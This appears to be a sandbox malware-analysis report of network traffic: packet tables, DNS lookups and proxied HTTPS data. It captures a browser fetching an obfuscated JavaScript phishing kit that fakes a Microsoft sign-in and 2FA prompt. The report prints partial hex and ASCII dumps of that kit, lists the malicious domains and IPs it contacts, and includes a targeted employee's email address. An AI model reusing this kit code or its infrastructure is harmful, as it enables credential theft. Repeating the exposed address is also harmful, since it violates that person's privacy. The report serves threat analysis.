Mar 27, 2025 18:32:06.268649101 CET	49813	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:06.268670082 CET	443	49813	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:06.272394896 CET	49813	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:06.272401094 CET	443	49813	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:06.392729998 CET	443	49814	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:06.392803907 CET	443	49814	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:06.392860889 CET	49814	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:06.394203901 CET	49814	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:06.394236088 CET	443	49814	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:06.750747919 CET	443	49813	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:06.750850916 CET	443	49813	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:06.750901937 CET	49813	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:06.751667976 CET	49813	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:06.751682997 CET	443	49813	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:12.001924038 CET	49789	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:12.165199995 CET	8248	49789	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:12.833926916 CET	49815	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:12.833976030 CET	443	49815	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:12.834218979 CET	49815	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:12.834438086 CET	49816	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:12.834672928 CET	49815	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:12.834707975 CET	443	49815	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:12.996522903 CET	8248	49816	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:12.998869896 CET	49816	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:12.999115944 CET	49816	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:13.145627022 CET	443	49815	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.147255898 CET	49815	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.147322893 CET	443	49815	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.147356987 CET	49815	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.147370100 CET	443	49815	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.160362005 CET	8248	49816	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:13.205697060 CET	49816	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:13.213644028 CET	49816	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:13.214122057 CET	49816	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:13.226453066 CET	49764	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:13.376583099 CET	8248	49816	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:13.376666069 CET	8248	49816	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:13.381352901 CET	49817	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:13.381408930 CET	443	49817	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:13.381581068 CET	49817	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:13.381623030 CET	49817	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:13.381632090 CET	443	49817	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:13.392805099 CET	8248	49764	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:13.424833059 CET	49816	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:13.566258907 CET	443	49817	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:13.566454887 CET	49817	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:13.566497087 CET	443	49817	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:13.566597939 CET	49817	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:13.566605091 CET	443	49817	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:13.617012978 CET	443	49815	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.617206097 CET	443	49815	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.617328882 CET	49815	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.617831945 CET	49815	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.617861986 CET	443	49815	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.623835087 CET	49818	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.623888969 CET	443	49818	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.624479055 CET	49818	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.624711037 CET	49818	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.624742985 CET	443	49818	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.797055960 CET	443	49817	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:13.797115088 CET	443	49817	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:13.797173977 CET	49817	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:13.797826052 CET	49817	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:13.797843933 CET	443	49817	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:13.798983097 CET	49816	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:13.801744938 CET	49819	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:13.801794052 CET	443	49819	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:13.801868916 CET	49819	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:13.802017927 CET	49819	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:13.802046061 CET	443	49819	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:13.942246914 CET	443	49818	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.942498922 CET	49818	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.942524910 CET	443	49818	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.942651987 CET	49818	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:13.942658901 CET	443	49818	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:13.988507986 CET	443	49819	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:13.988950968 CET	49819	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:13.989029884 CET	443	49819	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:13.989073038 CET	49819	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:13.989085913 CET	443	49819	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:14.000315905 CET	8248	49816	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:14.224423885 CET	443	49819	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:14.224600077 CET	443	49819	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:14.224670887 CET	49819	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:14.225821018 CET	49819	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:14.225851059 CET	443	49819	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:14.418124914 CET	443	49818	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:14.418272018 CET	443	49818	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:14.418330908 CET	49818	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:14.418848991 CET	49818	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:14.418860912 CET	443	49818	104.168.138.190	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2025 18:29:01.740396023 CET	53	60954	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:01.786294937 CET	53	65045	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:02.482738018 CET	53	59189	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:02.654390097 CET	53	56649	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:05.939244032 CET	58742	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:05.939455986 CET	54215	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:06.031393051 CET	53	58742	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:06.031431913 CET	53	54215	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:06.933909893 CET	56813	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:06.934144974 CET	50124	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:07.273471117 CET	53	56813	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:07.515923023 CET	53	50124	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:08.547828913 CET	53869	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:08.548046112 CET	64036	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:08.939136982 CET	53	53869	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:08.939173937 CET	53	64036	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:10.366808891 CET	53	63668	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:11.021137953 CET	63188	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:11.021467924 CET	57541	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:11.111114979 CET	53	63188	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:11.111474991 CET	53	57541	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:11.682188988 CET	51468	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:11.682543039 CET	57344	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:11.772322893 CET	53	51468	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:11.772764921 CET	53	57344	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:12.281411886 CET	52624	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:12.281867981 CET	61697	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:12.371474028 CET	53	52624	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:12.371947050 CET	53	61697	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:19.781316996 CET	53	51218	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:24.254203081 CET	51980	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:24.254452944 CET	63107	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:24.438663006 CET	53	51980	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:24.623301983 CET	53	63107	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:25.014974117 CET	55232	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:25.015146971 CET	52034	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:25.103120089 CET	53	55232	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:25.103157043 CET	53	52034	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:25.534425974 CET	53772	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:25.534558058 CET	51285	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:25.623156071 CET	53	53772	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:25.623173952 CET	53	51285	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:32.746520996 CET	61078	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:32.746809006 CET	50183	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:32.915323973 CET	53	50183	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:32.915354967 CET	53	61078	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:38.833640099 CET	53	49456	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:40.002119064 CET	53	50746	162.159.36.2	192.168.2.4
Mar 27, 2025 18:29:48.963011980 CET	64024	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:48.963203907 CET	59487	53	192.168.2.4	1.1.1.1
Mar 27, 2025 18:29:49.058304071 CET	53	64024	1.1.1.1	192.168.2.4
Mar 27, 2025 18:29:49.058345079 CET	53	59487	1.1.1.1	192.168.2.4
Mar 27, 2025 18:30:01.291635990 CET	53	61528	1.1.1.1	192.168.2.4
Mar 27, 2025 18:30:01.767236948 CET	53	62706	1.1.1.1	192.168.2.4
Mar 27, 2025 18:30:08.211245060 CET	138	138	192.168.2.4	192.168.2.255
Mar 27, 2025 18:30:32.658591032 CET	53	60214	1.1.1.1	192.168.2.4
Mar 27, 2025 18:31:17.130774021 CET	53	50572	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 27, 2025 18:29:07.516021967 CET	192.168.2.4	1.1.1.1	c227	(Port unreachable)	Destination Unreachable
Mar 27, 2025 18:29:24.637075901 CET	192.168.2.4	1.1.1.1	c23e	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 27, 2025 18:29:05.939244032 CET	192.168.2.4	1.1.1.1	0xe6b4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:05.939455986 CET	192.168.2.4	1.1.1.1	0x6828	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 27, 2025 18:29:06.933909893 CET	192.168.2.4	1.1.1.1	0x4885	Standard query (0)	office.avcbtech.store	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:06.934144974 CET	192.168.2.4	1.1.1.1	0xe539	Standard query (0)	office.avcbtech.store	65	IN (0x0001)	false
Mar 27, 2025 18:29:08.547828913 CET	192.168.2.4	1.1.1.1	0xf9f3	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:08.548046112 CET	192.168.2.4	1.1.1.1	0x7226	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 27, 2025 18:29:11.021137953 CET	192.168.2.4	1.1.1.1	0x37d5	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:11.021467924 CET	192.168.2.4	1.1.1.1	0x5d99	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 27, 2025 18:29:11.682188988 CET	192.168.2.4	1.1.1.1	0x8454	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:11.682543039 CET	192.168.2.4	1.1.1.1	0xea00	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 27, 2025 18:29:12.281411886 CET	192.168.2.4	1.1.1.1	0xaa55	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:12.281867981 CET	192.168.2.4	1.1.1.1	0xe525	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 27, 2025 18:29:24.254203081 CET	192.168.2.4	1.1.1.1	0xa76f	Standard query (0)	server1.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:24.254452944 CET	192.168.2.4	1.1.1.1	0x8cc6	Standard query (0)	_8248._https.server1.linxcoded.top	65	IN (0x0001)	false
Mar 27, 2025 18:29:25.014974117 CET	192.168.2.4	1.1.1.1	0x4458	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:25.015146971 CET	192.168.2.4	1.1.1.1	0x9068	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 27, 2025 18:29:25.534425974 CET	192.168.2.4	1.1.1.1	0x43d5	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:25.534558058 CET	192.168.2.4	1.1.1.1	0xd65	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 27, 2025 18:29:32.746520996 CET	192.168.2.4	1.1.1.1	0x5752	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:32.746809006 CET	192.168.2.4	1.1.1.1	0x6445	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 27, 2025 18:29:48.963011980 CET	192.168.2.4	1.1.1.1	0x11d8	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:48.963203907 CET	192.168.2.4	1.1.1.1	0xc607	Standard query (0)	avcbtech.site	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 27, 2025 18:29:06.031393051 CET	1.1.1.1	192.168.2.4	0xe6b4	No error (0)	www.google.com		142.251.40.164	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:06.031431913 CET	1.1.1.1	192.168.2.4	0x6828	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 27, 2025 18:29:07.273471117 CET	1.1.1.1	192.168.2.4	0x4885	No error (0)	office.avcbtech.store		139.28.36.38	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:08.939136982 CET	1.1.1.1	192.168.2.4	0xf9f3	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:11.111114979 CET	1.1.1.1	192.168.2.4	0x37d5	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:11.111114979 CET	1.1.1.1	192.168.2.4	0x37d5	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:11.111114979 CET	1.1.1.1	192.168.2.4	0x37d5	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:11.111114979 CET	1.1.1.1	192.168.2.4	0x37d5	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:11.772322893 CET	1.1.1.1	192.168.2.4	0x8454	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 18:29:11.772322893 CET	1.1.1.1	192.168.2.4	0x8454	No error (0)	ipv4.imgur.map.fastly.net		199.232.88.193	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:11.772764921 CET	1.1.1.1	192.168.2.4	0xea00	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 18:29:11.774617910 CET	1.1.1.1	192.168.2.4	0xc7c	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 18:29:11.774617910 CET	1.1.1.1	192.168.2.4	0xc7c	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:12.371474028 CET	1.1.1.1	192.168.2.4	0xaa55	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 18:29:12.371474028 CET	1.1.1.1	192.168.2.4	0xaa55	No error (0)	ipv4.imgur.map.fastly.net		199.232.88.193	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:12.371947050 CET	1.1.1.1	192.168.2.4	0xe525	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 18:29:12.377646923 CET	1.1.1.1	192.168.2.4	0x23a	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 18:29:12.377646923 CET	1.1.1.1	192.168.2.4	0x23a	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:24.438663006 CET	1.1.1.1	192.168.2.4	0xa76f	No error (0)	server1.linxcoded.top		185.174.100.76	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:24.623301983 CET	1.1.1.1	192.168.2.4	0x8cc6	Name error (3)	_8248._https.server1.linxcoded.top	none	none	65	IN (0x0001)	false
Mar 27, 2025 18:29:25.103120089 CET	1.1.1.1	192.168.2.4	0x4458	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:25.103120089 CET	1.1.1.1	192.168.2.4	0x4458	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:25.103120089 CET	1.1.1.1	192.168.2.4	0x4458	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:25.103157043 CET	1.1.1.1	192.168.2.4	0x9068	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 27, 2025 18:29:25.623156071 CET	1.1.1.1	192.168.2.4	0x43d5	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:25.623156071 CET	1.1.1.1	192.168.2.4	0x43d5	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:25.623156071 CET	1.1.1.1	192.168.2.4	0x43d5	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:25.623173952 CET	1.1.1.1	192.168.2.4	0xd65	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 27, 2025 18:29:32.915354967 CET	1.1.1.1	192.168.2.4	0x5752	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 27, 2025 18:29:49.058304071 CET	1.1.1.1	192.168.2.4	0x11d8	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

office.avcbtech.store

sender.linxcoded.top

code.jquery.com

i.imgur.com

api.ipify.org

avcbtech.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	139.28.36.38	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:07 UTC	574	OUT	GET /kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com HTTP/1.1 Host: office.avcbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:08 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.3 Date: Thu, 27 Mar 2025 17:29:08 GMT Content-Type: application/javascript Content-Length: 68421 Last-Modified: Fri, 14 Mar 2025 13:25:44 GMT Connection: close ETag: "67d42e58-10b45" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-27 17:29:08 UTC	15988	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 31 31 62 28 29 7b 76 61 72 20 5f 30 78 35 30 64 36 39 35 3d 5b 27 23 62 61 63 6b 27 2c 27 49 6e 63 6f 72 72 65 63 74 5c 78 32 30 32 46 41 5c 78 32 30 63 6f 64 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 76 36 27 2c 27 23 62 61 63 6b 2d 74 65 78 74 27 2c 27 74 79 70 65 27 2c 27 4d 69 63 72 6f 73 6f 66 74 27 2c 27 72 65 6c 61 79 27 2c 27 36 6b 67 6a 58 4c 43 27 2c 27 73 74 79 6c 65 27 2c 27 70 61 67 65 5f 76 69 73 69 74 27 2c 27 63 6c 6f 73 65 27 2c 27 61 70 70 72 6f 76 65 5f 73 69 67 6e 69 6e 27 2c 27 64 69 76 35 27 2c 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 27 23 63 61 70 74 63 68 61 2d 62 74 6e 27 2c 27 2e 6c 6f 67 6f 6e 61 6d 65 27 2c 27 64 69 73 61 62 Data Ascii: function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disab
2025-03-27 17:29:08 UTC	16384	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 35 31 2c 5c 78 32 30 35 31 2c 5c 78 32 30 35 31 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: \x20\x20\x20\x20\x20\x20\x20font-size:\x2016px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20rgb(51,\x2051,\x2051);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
2025-03-27 17:29:08 UTC	16384	IN	Data Raw: 32 32 3e 3c 70 5c 78 32 30 69 64 3d 5c 78 32 32 61 70 70 72 6f 76 65 2d 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 33 5c 78 32 30 74 65 78 74 2d 63 65 6e 74 65 72 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 72 64 65 72 3a 5c 78 32 30 32 70 78 5c 78 32 30 73 6f 6c 69 64 5c 78 32 30 62 6c 61 63 6b 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 34 30 70 78 3b 5c 78 32 30 70 61 64 64 69 6e 67 3a 5c 78 32 30 31 32 70 78 5c 78 32 30 31 32 70 78 3b 5c 78 32 30 74 65 78 74 2d 61 6c 69 67 6e 3a 5c 78 32 30 63 65 6e 74 65 72 3b 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 78 32 32 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 27 2c 27 3c 61 5c 78 32 30 68 72 65 66 Data Ascii: 22><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22\x20style=\x22border:\x202px\x20solid\x20black;\x20font-size:\x2040px;\x20padding:\x2012px\x2012px;\x20text-align:\x20center;\x20display:\x20inline-block;\x22></p></div><br>','<a\x20href
2025-03-27 17:29:08 UTC	16384	IN	Data Raw: 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 5f 30 78 34 64 34 61 64 61 28 30 78 32 34 62 29 29 2c 5f 30 78 35 66 63 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 62 6f 72 64 65 72 2d 64 61 72 6b 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 Data Ascii: 